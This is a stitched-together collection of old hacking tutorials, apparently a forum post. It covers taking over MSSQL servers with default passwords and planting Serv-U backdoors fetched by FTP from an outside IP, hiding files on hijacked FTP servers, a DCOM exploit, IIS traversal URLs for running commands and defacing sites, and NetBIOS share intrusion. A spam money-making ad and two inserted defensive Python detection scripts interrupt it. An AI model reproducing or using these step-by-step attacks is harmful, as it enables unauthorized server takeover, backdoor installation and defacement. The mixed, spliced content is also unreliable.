You are now connected to the server. If you cant seem to connect, the server info has changed or been patched. Moving On.... The Main Commands for SQLExec are: dir c:\ This will list the "c:\" drives contents and show free space, change the drive letter accordingly. md c:\recycler\_tmp Will make any directory you tell it to, this command creates the folder "_tmp" in c:\recycler. del c:\recycler\filename.exe Will delete any file you tell it to. copy c:\winnt\system32\tsksrv.exe c:\recycler\_tmp This moves the file Mail:mtahirzahid@yahoo.com
Power Of Hacking specified to any directory you wish. Great for hiding your Serv-U Files after you transferred them. ------------------------------------------------------------------------------The commands above are the most common used. Now we are ready to hack some stro! Stop - Make sure you have done everything so far, and have read carefully. You should be connected to the victim, enter in the command box "dir c:\" and press enter. The person's c:\ drive listing should show up with Free Drive Space:
This is the command set for getting your Serv-U files from your Anonymous Pub you setup earlier to the server. This tells the client to connect to IP: 127.0.0.1 on Port 21. And download Winmgnt.exe and Servudaemon.ini from the root. echo open 62.2.239.111 >> C:\3.txt echo anonymous >> C:\3.txt echo anonymous@dude.com >> C:\3.txt echo BINARY >> C:\3.txt echo get tsksrv.exe >> C:\3.txt echo get ml_hconf.dll >> C:\3.txt echo quit >> C:\3.txt ftp -i -s:C:\3.txt Mail:mtahirzahid@yahoo.com
Power Of Hacking You enter in these commands one by one, after entering in the first one you should get a beep, or "SQL_NO_DATA". After you get eiter of these move onto the next command. The last command "ftp -i -s:C:\3.txt" will have the computer connect and download the files. SQLExec will "lock-up" during the time it is downloading, then the screen will re-appear when done & should show the following:
The Default directory that the serv-u files goto is "system32". Most stro's its c:\winnt\system32. So in our command box, type dir c:\winnt\system32\ That will list the system32 directory. Like So
Now that your files are on the computer its time to hide them. In your command box type md c:\recycler\_tmp That is where we will hide the files.
Now type copy c:\winnt\system32\tsksrv.exe c:\recycler\_tmp and Press Enter. Then type: copy c:\winnt\system32\ ml_hconf.dll.ini c:\recycler\_tmp Now your files are well hidden from the sys-op. You are now ready to start your server. Copy the IP to the Clipboard. Because you will need it. To start the server simply type: c:\winnt\system32\tsksrv.exe SQLExec should now Lock up for good. And if everything went well you should be able to connect to your server on the port you setup. See Part 2
Power Of Hacking Other Things to Do After Your Server is Running
1. Getting your Server to Auto-Start with the Computer: Open up your Site in FlashFXP. Get setit.exe from the Needed Utilities up above, put it in the folder where your files are located, and press "Control R" and enter "site exec setit.exe servername.exe" That will put your server to Auto Start with the PC.
2. Securing the server from being rehacked: Open up your site in FlashFXP. Get "osql" here and put it in the MSSQL\binn folder, usually found in c:\ or c:\Program Files\Microsoft SQL Server\MSSQL\binn. Make sure osql.exe is in the "binn" folder, or this will not work!
Sometimes osql.exe is already on the server, and sometimes the sys-ops remove it, so it's good to have. Now you are going to change the server's password (the one you used to connect in SQLExec). Here are the commands you will use in FlashFXP:

For blank pass: site exec osql.exe -U sa -P "" -Q "sp_password NULL,Logon,sa"
For sa pass: site exec osql.exe -U sa -P "sa" -Q "sp_password sa,Logon,sa"
For password pass: site exec osql.exe -U sa -P "password" -Q "sp_password password,Logon,sa"
For admin pass: site exec osql.exe -U sa -P "admin" -Q "sp_password admin,Logon,sa"
That will change the logon to sa/Logon instead of sa/sa or sa/blank, securing it from being rehacked.
Thats all Folks! Happy UK BOYS!!
Closing Notes: I spent many hours on this tutorial. I know it's not perfect; I'm open to suggestions/comments. But please do not give this out without giving full credit to me (the author). Not that anybody here would do that.
Commands:
echo open 62.2.239.111 >> C:\3.txt
echo anonymous >> C:\3.txt
echo anonymous@dude.com >> C:\3.txt
echo BINARY >> C:\3.txt
echo get tsksrv.exe >> C:\3.txt
echo get ml_hconf.dll >> C:\3.txt
echo quit >> C:\3.txt
ftp -i -s:C:\3.txt
======================================
del c:\3.txt

Want to make 800 a month doing nothing? Well of course you would, why wouldn't you? It's easier than you thought and this file has sure proven ways to make you rich quick. Don't waste your time with cheap affiliate programs and pyramid scams. It's a lot easier to just download a little plug-in! Just follow these easy steps:
1. Sign up at http://www.download4cash.tk
2. Advertise your site, make an e-book, and submit your site to search engines. (Hint: use peer 2 peer file sharing programs like Kazaa or WinMX)
3. Sit back and collect your money!
I wish you the best of luck on your trip to becoming rich like me! Have fun! And good luck!

Advanced pub taggin': The purpose of this post is to show you folks how to very securely lock a pub up, making it very difficult and time consuming to crack. This will greatly increase pub vitality. I strongly recommend that you take my intro to pub taggin' before engaging in this tutorial (just so you get the hang of it).
¤¤FlashFXP is the only program that will get the job done here¤¤
Step 1. Finding a Hidden Directory
1. Take an addy from a scan, i.e. (208.34.124.35), and use the quick connect feature in FlashFXP to connect.
2. Once connected, look for a hidden directory. In the path type in " /", that's "space/" with no quotation marks. About 50% of the time a pub will have one of these; it is not visible in the root directory, thus a good place to start for your tag.
3. Note: if there isn't a hidden directory to start from, I recommend finding the most inconspicuous path with the most folders, i.e. /receive/Windows/Application Data/Microsoft/Internet Explorer/UserData/CPIJSPYR/, and then start your tag from there.

Step 2. Going Deep (Making a Series of Folders)
1. Start by making a folder and labeling it "1" without the quotations.
2. Go into this folder and create folder "2", and so on.
3. So your path should now look something like this: 208.34.124.35/ /1/2/3/4/5/6/7/8/9/10/ If you are starting from a hidden directory I recommend going about 10 directories deep; if you are starting from an "inconspicuous path" I say go 5 deep or so.
4. Now rename your last directory "10" to something like ".UpLoAd_HeRe" and do NOT lock it.
5. Make note of the path in a txt document and update it as you go along. So right now you have: 208.34.124.35/ /1/2/3/4/5/6/7/8/9/.UpLoAd_HeRe/ Continue renaming the path backwards using various locking techniques (NEXT STEP) and updating the txt document.

Step 3. Use of Locking Techniques
Note: Okay, it's time to get creative. Not only are you going to lock up the path, but you are also going to make deceptive locked folders that will piss a pub cracker off, and thus they may just leave it alone because it is not worth the time.
1. Typical piss-off locked folder.
- Make a com or aux type folder, i.e. com1 (for a review on how to make these, read my introduction to pub taggin' tutorial).
- Okay, so it's time to get sneaky. I.e. if you labeled your folder com3, make a bundle more com folders. Here are your options:
i. Make a multitude of com3 folders by varying the spacing, i.e. "com3 / /" "com3 / /" "com3 / /". Eventually the folder looks like this (PLEASE NOTE the com3 spacing that you made for yourself in the txt document):
com3 com3 com3 com3 com3 com3 com3 com3 com3
- Just looking at that would make me not want to bother cracking it.
ii. Making com1-com9 folders: com1 com2 com3 com4 com5 com6 etc.
2. ALT Codes - by using ALT codes you can also piss off a cracker. To use ALT codes you must hold the ALT button and then press a combination of number keys (the ones located on the right side of your keyboard). **At the end of the name of the ALT code directory place a "." and then lock it (you can also put a "." at the start to make the directory invisible (recommended)). I.e. ".____¤§¤TÃGgÊÐ_ßý_M®._ÐþG¤§¤___. / /", so you will see it as ".____¤§¤TÃGgÊÐ_ßý_M®._ÐþG¤§¤___."
- Now take note of the directory you created (copy it to your txt document) and proceed to make variations of that locked folder by varying the spacing on the lock or the ALT codes used. The net result is that you will have a tough-to-crack multitude of piss-off directories, and it will look like this:
.____¤§¤TÃGgÊÐ_ßý_M®._ÐþG¤§¤___.
.____¤§¤TÃGgÊÐ_ßý_M®._ÐþG¤§¤___.
.____¤§¤TÃGgÊÐ_ßý_M®._ÐþG¤§¤___.
.____¤§¤TÃGgÊÐ_ßý_M®._ÐþG¤§¤___.
.____¤§§¤TÃGgÊÐ_ßý_M®._ÐþG¤§§¤___.
.____¤¤§¤TÃGgÊÐ_ßý_M®._ÐþG¤§¤¤___.
.____¤¤§¤TÃGgÊÐ_ßý_M®._ÐþG¤§¤¤___.
¤¤OKAY YOU ARE ON YOUR WAY TO CREATING SOME BAD AZZ LOCKED PUBS¤¤ Here is an example of what your end product should look like:
Code:
--------------------------------------------------------------------------------
<ftp://213.**.***.***/>
/com7
/.__¤§¤HÍÐÐËN_PÃtH¤§¤__.
/aux
/.__¤PuB§_fËr_ThÊ_PËÊp§¤__.
/com5
/.__¤§CÃnNËÐ_by_§iMÔn¤__.
/com2
/.__¤TÃGgËd_fÔR_LÔu¤__.
/.UpLoAd_HeRe/
--------------------------------------------------------------------------------
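For the sys-op on the other side of this post, an audit of a writable FTP area for exactly the naming tricks described above (space-only names, reserved device names with trailing spaces, leading dots, ALT-code characters, unusual nesting depth). This is an added example, not code from the post or from FlashFXP; the listing, the six-level depth threshold and the function names are constructed assumptions.

```python
# Names Windows reserves for devices; a directory called "COM1" (with or
# without trailing spaces/dots) cannot be entered through a normal path.
RESERVED = ({"con", "prn", "aux", "nul"}
            | {f"com{n}" for n in range(1, 10)}
            | {f"lpt{n}" for n in range(1, 10)})

# Constructed recursive listing of a writable FTP area (one entry per path,
# directories end in '/'); not taken from any real server.
SAMPLE_TREE = [
    "/pub/",
    "/pub/readme.txt",
    "/pub/ /",
    "/pub/ /COM1 /",
    "/pub/ /COM1 / /",
    "/pub/ /COM1 / /LPT1 /",
    "/pub/ /COM1 / /LPT1 /folder1 /",
    "/pub/ /COM1 / /LPT1 /folder1 /folder2/",
    "/pub/ /COM1 / /LPT1 /folder1 /folder2/.UpLoAd_HeRe/",
    "/pub/.__¤§¤TÃGgÊÐ_ßý_M®._ÐþG¤§¤__./",
    "/incoming/",
    "/incoming/drivers/",
]


def check_name(name: str) -> list:
    """Reasons a single path component looks like a tagging trick; [] if ordinary."""
    reasons = []
    if name.strip() == "":
        reasons.append("whitespace-only name (invisible in most listings)")
    elif name != name.rstrip(" ."):
        reasons.append("trailing space or dot (Windows strips it, so the path cannot be opened normally)")
    # 'COM1 ' and 'nul.txt' both resolve to a device name on Windows
    base = name.strip(" .").split(".")[0].lower()
    if base in RESERVED:
        reasons.append(f"reserved device name {base.upper()}")
    if name.startswith("."):
        reasons.append("leading dot hides it from default listings")
    if any(ord(ch) > 127 for ch in name):
        reasons.append("non-ASCII (ALT-code) characters")
    return reasons


def audit_paths(paths, max_depth: int = 6) -> list:
    """Flag entries whose last component uses a trick, or which sit deeper
    than max_depth levels (an assumed threshold; tune it to your layout)."""
    findings = []
    for path in paths:
        parts = path.strip("/").split("/") if path.strip("/") else []
        if not parts:
            continue
        reasons = check_name(parts[-1])   # parents are listed as their own entries
        if len(parts) > max_depth:
            reasons.append(f"nested {len(parts)} levels deep")
        if reasons:
            findings.append({"path": path, "depth": len(parts), "reasons": reasons})
    return findings


def reserved_names_used(paths) -> set:
    """Which reserved device names appear anywhere in the tree."""
    found = set()
    for path in paths:
        for part in path.strip("/").split("/"):
            base = part.strip(" .").split(".")[0].lower()
            if base in RESERVED:
                found.add(base.upper())
    return found


if __name__ == "__main__":
    for f in audit_paths(SAMPLE_TREE):
        print(repr(f["path"]), "->", "; ".join(f["reasons"]))
    print("device names in tree:", sorted(reserved_names_used(SAMPLE_TREE)))
```

Feed it the output of a recursive listing of your anonymous-writable areas; anything it flags is worth a look even when the last component is harmless, because the tag is built from the parents.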
And here's a convenient list of ALT codes for gettin' the job done:
Code:
--------------------------------------------------------------------------------
¤ = Alt+15, ¶ = Alt+20, § = Alt+21, Ç = Alt+128, ü = Alt+129, é = Alt+130, â = Alt+131, ä = Alt+132, à = Alt+133, å = Alt+134,
ç = Alt+135, ê = Alt+136, ë = Alt+137, è = Alt+138, ï = Alt+139, î = Alt+140, ì = Alt+141, Ä = Alt+142, Å = Alt+143, É = Alt+144,
æ = Alt+145, Æ = Alt+146, ô = Alt+147, ö = Alt+148, ò = Alt+149, û = Alt+150, ù = Alt+151, ÿ = Alt+152, Ö = Alt+153, Ü = Alt+154,
¢ = Alt+155, £ = Alt+156, ¥ = Alt+157, ƒ = Alt+159, á = Alt+160, í = Alt+161, ó = Alt+162, ú = Alt+163, ñ = Alt+164, Ñ = Alt+165,
ª = Alt+166, º = Alt+167, ¿ = Alt+168, ¬ = Alt+170, ½ = Alt+171, ¼ = Alt+172, ¡ = Alt+173, « = Alt+174, » = Alt+175, ¦ = Alt+179,
ß = Alt+225, µ = Alt+230, ± = Alt+241, ÷ = Alt+246, ° = Alt+248, • = Alt+249, · = Alt+250, ² = Alt+253,
„ = Alt+0132, … = Alt+0133, † = Alt+0134, ‡ = Alt+0135, ˆ = Alt+0136, ‰ = Alt+0137, Š = Alt+0138, Œ = Alt+0140, Ŕ = Alt+0150, ŕ = Alt+0151,
˜ = Alt+0152, ™ = Alt+0153, š = Alt+0154, œ = Alt+0156, Ÿ = Alt+0159, © = Alt+0169, ® = Alt+0174, ³ = Alt+0179, ¹ = Alt+0185, º = Alt+0186,
¾ = Alt+0190, À = Alt+0192, Á = Alt+0193, Â = Alt+0194, Ã = Alt+0195, È = Alt+0200, Ê = Alt+0202, Ë = Alt+0203, Ì = Alt+0204, Í = Alt+0205,
Î = Alt+0206, Ï = Alt+0207, Ð = Alt+0208, Ò = Alt+0210, Ó = Alt+0211, Ô = Alt+0212, Õ = Alt+0213, × = Alt+0215, Ø = Alt+0216, Ù = Alt+0217,
Ú = Alt+0218, Û = Alt+0219, Ý = Alt+0221, Þ = Alt+0222, ä = Alt+0228, õ = Alt+0245, ø = Alt+0248, ý = Alt+0253, þ = Alt+0254
--------------------------------------------------------------------------------

I will tell you how to scan and hack using this exploit. First get a scanner; scanms.exe will do. To scan, go to cmd and write

scanms.exe ip_start-ip_end

ex: scanms.exe 127.0.0.1-127.255.255.255

The scanner will start working and you will get some results like these:

IP Address      REMACT  SYSACT  DCOM Version
----------------------------------------------
127.0.97.246    [? ? ]  [....]  5.4
127.0.99.26     [ptch]  [ptch]  5.6
127.0.101.81    [....]  [ptch]  0.0
127.0.97.218    [....]  [VULN]  0.0
127.0.70.132    [ptch]  [ptch]  5.6
127.0.101.210   [VULN]  [VULN]  5.6
127.0.96.40     [ptch]  [ptch]  5.6
127.0.97.238    [....]  [VULN]  0.0
127.0.103.137   [....]  [VULN]  0.0
127.0.100.226   [....]  [VULN]  0.0
127.0.100.170   [....]  [VULN]  0.0

Then you delete the patched ones and edit the vuln ones to show only the IP, but you need to pay attention to the DCOM version, in this case 0 and 5. Then you get universal.exe, a nice exploit that is the best right now: 0 = all Win2k, 5 = all WinXP.
Then you run universal.exe 0 ip. If you get lucky you will get a shell in return. Now, to secure it, do this: install the FTP and upload reg.exe, the registry editor, then write

reg.exe delete HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Ole /v EnableDCOM

Answer yes here, then

reg.exe add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Ole /v EnableDCOM /t REG_SZ /d N

And that's all.

IIS Hacking Tutorial
All the stuff works on IIS 4/5 servers without any security updates!
************
INTRO: Hacking an IIS server is pretty much like taking candy from a baby. No really, it's that easy. In this tutorial I'm going to walk you through 0wnz'ing your very own IIS server and show you how to deface the site, but I seriously don't encourage this. I don't agree with needless defacing unless it's your first time, but I'm not against defacing to stand up for your rights, punish a site with bad intentions (even though the site can be rebuilt) or to make a strong point. If you're going to use the *I defaced your site because it had bad security* line, you could just as easily mail the admin. I'm telling you all how to do this so you know how easy it is. Please don't abuse the information I give you.
---------------------------------------------
************
Finding vulnerable servers: There are *many, many* vulnerabilities in IIS, but I'm going to discuss one of the latest. This vulnerability allows the execution of arbitrary code. To see if a site is vulnerable, try these links:
www.TARGET.com/scripts/..%255c..%25....exe?/c+dir+c:\
www.TARGET.com/msadc/..%255c..%255c....exe?/c+dir+c:\
www.TARGET.com/cgi-bin/..%255c..%25....exe?/c+dir+c:\
www.TARGET.com/samples/..%255c..%25....exe?/c+dir+c:\
www.TARGET.com/iisadmpwd/..%255c..%....exe?/c+dir+c:\
www.TARGET.com/_vti_cnf/..%255c..%2.../system32/cmd.exe?/c+dir+c:\
www.TARGET.com/_vti_bin/..%255c..%2.../system32/cmd.exe?/c+dir+c:\
www.TARGET.com/adsamples/..%255c..%.../system32/cmd.exe?/c+dir+c:\
If the server is vulnerable you should get a listing of the C drive. If none of these links work, the server probably isn't vulnerable. OK, so let's say you got a listing of the C: contents; it should look something like:
-------------------------------------------
Directory of c:\
11/15/02 08:50a (DIR) WINNT
11/15/02 09:15a (DIR) Program Files
11/15/02 09:20a (DIR) TEMP
11/15/02 09:21a (DIR) CPQ SYSTEM
11/15/02 09:50a (DIR) Inetpub
11/27/02 08:11a (DIR) CPQSUPSW
11/29/02 09:12a (DIR) CA_LIC
12/01/02 09:42a 140 server ip address.txt
04/06/02 04:44p 55,769 systemlog 06-04.txt
05/04/02 12:32p (DIR) test
10 File(s) 1,159,703,933 bytes
1,322,123,264 bytes free
---------------------------------------------
To navigate, just change the links to: /system32/cmd.exe?/c+dir+c:\winnt, for example to navigate to the WINNT directory. To navigate to a folder such as CPQ SYSTEM you would have to put: /system32/cmd.exe?/c+dir+c:\cpqsys~1 There must be six characters before the ~1 and no spaces (normal DOS rules). Use DOS on your own PC (or wherever there is a win32 b0x); this will greatly help you when it comes to using simple commands such as copy or listing the contents of a directory. Now, in order to find the main page of the website, we must find the webroot. The webroot is the path in which all the files for the site are held, including the main page. In my experience the webroot is usually found on the D: drive, but it can be any directory the admin chooses. Try: /system32/cmd.exe?/c+dir+d:\
This should list the contents of the D drive. Also a good tip: a lot of sites have *mock* webroots, where you think you have found the site's main page but it's not really, just a copy. You will have to visit the site and find the size of the main page and the other pages linked to it (right click and click Properties, normal win32 trick) and then match it up with the files in the webroot to find the real main page.
---------------------------------------
Now is a good time to give you some commands that will come in useful. To list all chosen files on the server use:
www.TARGET.com/whatever/..%c0%af..%...%c0%af..%c0%af/winnt/system32/cmd.exe?/c%20dir%20/S%20c:\*.whatever
To DOWNLOAD a file use:
www.TARGET.com/whatever/..%c0%af..%...%c0%af..%c0%af/winnt/system32/cmd.exe?/c%20type\c%20c:\whatever.file
When asked "What would you like to do with this file?" choose *run this program from its current location*. Choosing "save to disk" will get you a properties report of that file or something like that.
To DELETE (del) a file use:
www.TARGET.com/whatever/..%c0%af..%...%c0%af..%c0%af/winnt/system32/cmd.exe?/c%20del%20c:\whatever.file
To make a text file use:
www.TARGET.com/whatever/..%c0%af..%...%c0%af..%c0%af/winnt/system32/cmd.exe?/c%20echo%20You txt goes here!!!!!>%20test.txt
-------------------------------------
************
Changing the mainpage.htm
Now on to the important part: editing the website's main page. HTML is not needed, but if you want an in any way decent-looking deface you need to know it. If you don't know it, don't worry; any text in a file with a .htm or .html extension will show up in a browser. If
you want to learn HTML, it can be done by anybody; I learned the basics in about 1 day. OK, enough woman-girlie talk, on to the man stuff: you have to copy the file CMD.exe to the directory with the page in it. Let's call this page wannabie_admin.html, and let's say the directory wannabie_admin.html is in is C:\home\site. So the COPY command:
www.TARGET.com/whatever/..%c0%af..%...%c0%af..%c0%af/winnt/system32/cmd.exe?/c%20copy%20c:\winnt\system32\cmd.exe%20C:\home\site\CMD.exe
That will copy CMD.exe (like command.com in win98) to d:\home\site
Now to paste the text we want into wannabie_admin.html:
www.TARGET.com/whatever/..%c0%af..%...%c0%af..%c0%af/home/site/CMD.exe?/c%20echo%20Damn Wannabies! You run IIS and you just been cracked>%20wannabie_admin.html
Now your text should be on the main page. If you echo HTML code into wannabie_admin.html, you'll get a much better defacement. If you are going to do it, do it RIGHT!
-------------------------------------
Please, please listen to me, IIS servers >>>-LOG-<<< all the stuff! So use a >>>-PROXY-<<<
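The tutorial's own closing remark is the defender's lead: every one of these requests lands in the IIS log. The following log check, an added example rather than code from the tutorial, decodes request paths the way the vulnerable IIS 4/5 decoder did (two percent-decode passes, so %255c becomes a backslash, plus the overlong %c0%af forms folded to slashes) and flags traversal, cmd.exe, the /c switch, and the copied-shell second stage. The W3C field order, the sample lines and the function names are constructed assumptions.

```python
import re
from urllib.parse import unquote_to_bytes

# Overlong UTF-8 encodings of '/' and '\' that the IIS 4/5 decoder accepted
# (the %c0%af form in the links above); a correct decoder rejects them.
OVERLONG = {b"\xc0\xaf": b"/", b"\xc1\x9c": b"\\", b"\xc1\x1c": b"\\"}

# Assumed W3C extended log fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
LOG_RE = re.compile(
    r"^(?P<date>\S+) (?P<time>\S+) (?P<ip>\S+) (?P<method>\S+) "
    r"(?P<stem>\S+) (?P<query>\S+) (?P<status>\d+)$"
)

# Constructed sample log (not from any real server): four requests of the
# shape the tutorial describes, two ordinary ones.
SAMPLE_LOG = """\
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2002-11-15 08:50:01 10.0.0.5 GET /scripts/..%255c..%255cwinnt/system32/cmd.exe /c+dir+c:\\ 200
2002-11-15 08:50:09 10.0.0.5 GET /msadc/..%c0%af..%c0%afwinnt/system32/cmd.exe /c+dir+d:\\ 200
2002-11-15 08:51:30 10.0.0.5 GET /_vti_bin/..%255c..%255cwinnt/system32/cmd.exe /c+copy+c:\\winnt\\system32\\cmd.exe+c:\\home\\site\\cmd.exe 502
2002-11-15 08:52:02 10.0.0.5 GET /site/cmd.exe /c+echo+cracked>index.htm 502
2002-11-15 08:52:40 10.0.0.9 GET /index.htm - 200
2002-11-15 08:53:11 10.0.0.7 GET /docs/100%2525%20sure.htm - 200
"""


def decode_like_iis(raw: str) -> str:
    """Decode a request the way the vulnerable IIS did: two percent-decode
    passes (so %255c ends up as a backslash) with overlong UTF-8 folded to slashes."""
    data = raw.encode("latin-1", "replace")
    for _ in range(2):
        data = unquote_to_bytes(data)
        for bad, good in OVERLONG.items():
            data = data.replace(bad, good)
    return data.decode("latin-1")


def classify(raw: str, decoded: str) -> list:
    """Reasons a request matches the traversal/command pattern; [] if benign."""
    reasons = []
    low = raw.lower()
    if re.search(r"%25(5c|2f)", low):
        reasons.append("double-encoded path separator (%255c / %252f)")
    if re.search(r"%c[01]%[0-9a-f]{2}", low):
        reasons.append("overlong UTF-8 path separator (%c0%af style)")
    norm = decoded.replace("\\", "/").lower()
    stem = norm.split("?", 1)[0]
    if ".." in stem.split("/"):
        reasons.append("dot-dot segment escapes the virtual directory")
    if stem.endswith("/cmd.exe"):          # also catches a cmd.exe copied into the webroot
        reasons.append("cmd.exe requested through the web server")
    if re.search(r"\?/c[+ ]", norm):
        reasons.append("'/c' switch hands a command line to the shell")
    return reasons


def scan_log(lines) -> list:
    """One dict per suspicious request: ip, status, raw, decoded, reasons."""
    hits = []
    for line in lines:
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        m = LOG_RE.match(line)
        if not m:
            continue
        raw = m["stem"] if m["query"] == "-" else m["stem"] + "?" + m["query"]
        decoded = decode_like_iis(raw)
        reasons = classify(raw, decoded)
        if reasons:
            hits.append({"ip": m["ip"], "status": int(m["status"]),
                         "raw": raw, "decoded": decoded, "reasons": reasons})
    return hits


def count_by_ip(hits) -> dict:
    """Suspicious requests per source address, for a quick triage view."""
    counts = {}
    for h in hits:
        counts[h["ip"]] = counts.get(h["ip"], 0) + 1
    return counts


if __name__ == "__main__":
    found = scan_log(SAMPLE_LOG.splitlines())
    for h in found:
        print(h["ip"], h["status"], h["decoded"])
        for r in h["reasons"]:
            print("   -", r)
    print(count_by_ip(found))
```

A 200 on a cmd.exe request means the server actually ran the command; a 502 on the copy or echo step still shows the attempt and, as in the sample, the source address to block.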
Scanning in Windows (Normal):
Tools needed: fxscanner <-- handy because it can scan IIS & Pubs at the same time... hxxp://members.home.nl/m.hazebroek/progjes/FXScanner.ace
Open fxscanner and go to Exploits; enable both exploits (if you want): IIS and FTP (port 21: pubs).
Go to Options and edit the threads to about 50 threads
Go to IIS Unicode; the standard program hasn't got enough unicodes, so download more: hxxp://members.home.nl/m.hazebroek/progjes/Unicode.rar and overwrite your original Unicode.txt file with it.
Now go to Scan and go to Target Selection; you can add the range there by using wildcards, for example: 128.10.*.* Now you click on Add and the range has been added to the queue. You can add as many ranges as you want. If you're finished adding range(s), click on Go. You can view the results by clicking on Results (duh...) or by browsing to the fxscanner directory. The file http.txt contains the IIS results and ftp.txt contains the pubs.
Scanning Remote:
Tools needed: fxscanner hxxp://members.home.nl/m.hazebroek/progjes/FXScanner.ace
Before reading this I advise you to first read the normal scan instructions. If you did, let's go then...
Upload the files Fxscanner.exe and file.txt to a stro. Rename Fxscanner.exe to something else like svchost.exe. Go to raw command (Ctrl-W) and type:
quote: site exec svchost.exe -h
then: quote: site exec svchost.exe -f
Refresh now (F5); you should see a new file called scanner.ini. Edit it and set threads to about 10. You may try more threads, but it is likely that the admin will find out you're scanning because of the memory you use. Go to raw command (Ctrl-W) and type: quote: site exec svchost.exe -stop
A trace.log file has been made (refresh). Then again: quote: site exec svchost.exe -h
Then again: quote: site exec svchost.exe -f
then if you like: (closes scanner on remote side when done scanning): quote: site exec svchost.exe -c
Go to Rscanner.exe on your own PC, type the IP of the stro; the rest may stay default. Click on Connect. Add the ranges as you read in the normal scan. You may close Rscanner. After a while you can check your stro; the results are in ftp.txt and http.txt. You can also log in at any time to see how far it is with scanning.

Invisible Directories: They are directories that don't get listed. A sample path of an invisible directory is: /.tmp/ /folder1/ The 'space' isn't a name but a character, so it can't be listed, and the user won't see anything beyond the .tmp folder. The 'period' in front of tmp is to hide it from conventional FTP clients and somewhat from the site admin, because by default folders with a "." in front of them are considered to be hidden files and do not get listed. I found that SmartFTP can 'see' these so-called invisible directories (/ /) by default. To create the above path, you have to enter the paths in FlashFXP exactly (replace <space> with spacebar) in the following steps after hitting the Insert key to create dirs. You have to create the directory in step one first before you can create the directory in step two, and so on:
/.tmp/<space>/
/.tmp/<space>/<space>/
/.tmp/<space>/folder1/ <-- This is your working directory.
Inaccessible Directories: These are directories that you can't enter even if you see them. You can simply type the following in this order to do this:
/folder1<space>/<space>/
/folder1<space>/folder2/ <-- This is your working directory.
You won't be able to get past /folder1 / unless you know the name of folder2. A safer method is to use the following "unusable names":
COM1, COM2, COM3, COM4 -- Windows COM Ports
LPT1, LPT2, LPT3, LPT4 -- Windows Printer Ports
If you try to enter such a directory, you'll be returned an "incorrect function". A sample path of an inaccessible directory is: /COM1 /folder1/ To create the above path, you have to enter the paths in FlashFXP exactly (replace <space> with spacebar) in the following steps after hitting the Insert key to create dirs:
/COM1<space>/<space>/
/COM1<space>/folder1/ <-- This is your working directory.
Step-by-Step Sample Invisible/Inaccessible Dir: Again, enter the following exactly as you see it and replace the <space> with your spacebar and "folder1" and "folder2" with anything you want:
/<space>/<space>/
/<space>/COM1<space>/<space>/
/<space>/COM1<space>/<space>/<space>/
/<space>/COM1<space>/<space>/LPT1<space>/<space>/
/<space>/COM1<space>/<space>/LPT1<space>/yourname<space>/<space>/
/<space>/COM1<space>/<space>/LPT1<space>/folder1<space>/folder2/
Confusing?
Your working directory is the last line, or this:
/ /COM1 / /LPT1 /folder1 /folder2/
It is hidden through two (no name) folders and made inaccessible by one folder (folder1) and two "unusable names" (COM1, LPT1). Just want to say that the above examples are assuming that you're making dirs in the root. Most likely, you'll encounter pubs that only allow read/write access to certain directories such as "/upload", "/pub", "/incoming", "/_vti_pvt", and others. In that case, you'll have to add this to the path at the beginning. For example, if the working directory is "pub", then you'll have:
/pub/<space>/<space>/
/pub/COM1<space>/<space>/
/pub/COM1<space>/<space>/<space>/
-- and so on... Be creative in creating directories!

Netbios Hacking: Steps
1. Check if IP or host has netbios enabled
2. Input IP and relating sharename into HOSTS file
3. Find computer
4. If share is password protected, use resources to get around protection.
5. 0wn the b0x!

1. Before even trying anything with netbios, you must have netbios enabled and you must have file sharing enabled. First we must determine if the remote computer has netbios enabled, because without netbios
being enabled on your computer and the remote computer, none of the following will be able to happen. To check the remote computer's netbios status, DOS has a utility just for that, NBTSTAT.EXE. In Win9x/ME it's located at \windows; in Windows 2000/XP it's located at \winnt\system32. Nbtstat is run from the DOS prompt only; just open a DOS prompt and type in "nbtstat", no quotes. But to find out if the remote computer is exploitable and if we can access it, we use a certain nbtstat command, "nbtstat -A ip address", no quotes. If the command returns an output of "host not found", either the remote computer does not have file sharing enabled or the host is not responding to that command. But if the command returns a list, then the command was successful and netbios is enabled. The listing you now get might be confusing, but we are only really looking for a certain thing here. The <20> shows that the remote computer has file sharing enabled, among other things. Other services listed might be the messenger service and the name of the currently logged-on user. The name in front of the <20> is the sharename; this is basically what is needed to now gain access to the computer.
2. Now that we have the IP and the sharename of the computer, we can move on to putting those into the HOSTS file. The HOSTS file is a file that Windows looks at when it does any network translations from IP to netbios name and vice versa. Windows will always look at the HOSTS file before it looks anywhere else to translate; if Windows finds the IP and netbios name it's looking for, it doesn't go searching anywhere else like a central server. The HOSTS file has no file extension in Windows; it's simply called "HOSTS". In 9x/ME it's located at \WINDOWS; in 2000/XP it's located at \WINDOWS\system32\drivers\etc. Don't freak out if it's not found, because on a default installation of Windows there is no HOSTS file; you have to make one. It's very easy: just browse to the directory where it's supposed to be located, right click and go to New > Text Document, and save it in the directory as "HOSTS", no quotes. Now you have a HOSTS file. Make sure the file does not have a ".txt" extension; remember that the file just needs to be named "HOSTS". Windows may ask you to confirm that you want to have the file with no extension; this is OK and correct. Now go back and get the IP and sharename you just found, insert the IP first and then a space and then insert the sharename. After the IP and sharename are in the HOSTS file, click File > Save. Now it's time to see if we can actually get in.

3. On Win9x/ME systems go to Start > Search > Find Computer. On Windows 2000 it's the same, but for XP you go to Start > Search > Files or Folders, then click the label on the left-hand side called "Computers or People". Enter the IP of the remote computer and search for it; it should show up in the list and you double-click the computer to access its shares. If a box pops up and asks for a
password, then you can use a program called pqwak to brute force the password; it may take time to break the password. But mostly you will not encounter a password box; I personally have only encountered 1 out of dozens. Now you can browse the shared hard drive or share freely. When browsing, it's very slow, because of latency and because Windows has a flaw with Task Scheduler that slows down network browsing when using netbios: Task Scheduler checks the remote computer for any tasks at hand. Just let Windows Explorer take the information off the remote computer; it may take time, but it's very easy now to see what's on the remote computer. On some Windows 2000 and Windows NT systems, certain directories are not accessible due to restrictions on browsing local directories; you may try to open the Windows directory and get a box saying that the directory is off limits and that due to administrator restrictions you cannot open the directory.

Oracle:
Hacking Technique: Oracle Hacking
Active Port: 1521
Most Vulnerable Machines: Oracle
Needed Exploits: Oracle.rar
Needed Scanners: Any port scanner (in this tutorial we will use Scan1000.exe as our favorite scanner)
